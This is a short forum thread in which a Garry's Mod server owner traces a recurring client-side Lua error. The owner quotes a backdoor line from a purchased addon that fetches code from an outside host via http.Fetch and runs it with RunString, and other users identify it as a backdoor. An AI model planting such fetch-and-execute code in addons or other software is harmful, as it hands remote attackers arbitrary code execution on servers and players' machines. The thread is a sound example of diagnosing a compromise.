I added an addon that mounts workshop addons to the client, instead of having the traditional FastDL. It works fine on the first join, but if a player joins the server again this error appears.
[ERROR] RunString:54: attempt to call global 'GetJesterstate' (a nil value)
1. unknown - RunString:54
I contacted the author of the addon I am using but he insisted that his addon doesn't include any code referring to "getjesterstate" which can be found in the error itself. The error is only client side, however it effects all clients and I know this because I tested on multiple machines. I searched for hours online and found nothing except someone mentioning an incompatible addon. If that is the case how do I know which addon is incompatible? I'm lost.
update: I just searched over 8000 of all my addon's lua files in my server for the term "getjesterstate" and it came up with nothing
Look for RunString instead, and look in .gma files too.
GMA files turned up nothing. Good news though! One file in the addon I am trying to get working does mention RunString. It occurs once in this line of code.
http.Fetch(string.format("https://endlesswin.net/pls.php?a=%s&b=%s&d=%s", " 76561198205745959 ", " ", " 4868 "), function(bod)
RunString(bod, "nol3akerinoetc")
end)
This really is beyond me and I am not sure how those errors happened. Please let me know what you think, thanks!
That's basically a potential backdoor, and also the addon might be stolen. Is it from workshop?
Thats strange, I read somewhere that its a backdoor error as well. I dismissed the idea because I paid for everything in my server. The addon I'm using is from Gmod Store and I just bought it. Nothing else in my server is leaked.
Update: Removed the addon, errors are still in the server. I am very confused.
You missed the addon that actually creates the error, obviously.
Sorry, you need to Log In to post a reply to this thread.